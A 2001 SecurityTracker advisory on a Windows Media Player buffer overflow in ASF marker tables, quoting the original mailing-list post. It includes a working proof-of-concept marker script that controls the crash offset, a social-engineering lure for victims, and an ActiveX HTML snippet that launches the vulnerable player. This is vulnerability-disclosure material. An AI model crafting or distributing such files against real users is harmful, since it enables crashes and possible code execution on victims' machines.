SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Windows Media Player Vendors:   Microsoft
Windows Media Player ASF Marker Table Overflow Lets Remote Users Crash the Player in Certain Situations
SecurityTracker Alert ID:  1002159
SecurityTracker URL:  http://securitytracker.com/id/1002159
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 7 2001
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A vulnerability was reported with Microsoft's Windows Media Player that allows remote users to insert scripting into the marker table so that, when the user of the player clicks on the marker bar, the player will crash.

It is reported that a remote user can embed a long marker in a .ASF video file so that the player will crash when the player's user clicks on the marker drop down list under the file during playback.

The following demonstration exploit script can apparently be inserted into an ASF file to trigger the vulnerability:

----8<----cut-here-----8<----
start_marker_table
0.0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
0.1 Click here to bypass the advertisements!
end_marker_table
----8<----cut-here-----8<----

When the user of the player clicks on the bar, the Windows Media Player will crash at offset 43434343 ("CCCC").

It is reported that with Windows Media Player version 7, the remote user must use an ActiveX object on a HTML page to launch the vulnerable module. A demonstration example is provided below:

<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1
name=DSPlay1
type="application/x-oleobject">
<PARAM NAME="ShowControls" VALUE="-1">
<PARAM NAME="ShowGotoBar" VALUE="1">
<PARAM NAME="ShowStatusBar" VALUE="1">
<PARAM NAME="ControlType" VALUE="2">
<PARAM NAME="Filename" VALUE="a.asf">
<PARAM NAME="InvokeURLs" VALUE="-1">
</OBJECT>

Impact:   A remote user can create an ASF file that will cause the player to crash when the user of the player clicks on the marker bar.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  MS Windows Media Player ASF Marker Buffer Overflow


I dunno if I've sent this before.

If you embed a marker long enough in an .ASF video file
you can make WMP crash when a victim clicks the
marker drop down list under the file during playback.

Use ASFCHOP.EXE to embed the following script to any
ASF file:
----8<----cut-here-----8<----
start_marker_table
0.0 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
0.1 Click here to bypass the advertisements!
end_marker_table
----8<----cut-here-----8<----

As you can see, I used a catch to persuade the victim
to click the bar. When a victim clicks on the bar,
WMP crashes at offset 43434343 ("CCCC").

With WMP7 you have to use an ActiveX object on a HTML
page to launch the old buggy WMP module. Make sure you
set marker bar visible in the parameters. I guess it's
the parameter "ShowGotoBar"

Dummy example:

<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1 
name=DSPlay1
type="application/x-oleobject">
	<PARAM NAME="ShowControls" VALUE="-1">
	<PARAM NAME="ShowGotoBar" VALUE="1">
	<PARAM NAME="ShowStatusBar" VALUE="1">
    	<PARAM NAME="ControlType" VALUE="2">
    	<PARAM NAME="Filename" VALUE="a.asf">
    	<PARAM NAME="InvokeURLs" VALUE="-1">
</OBJECT>


_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC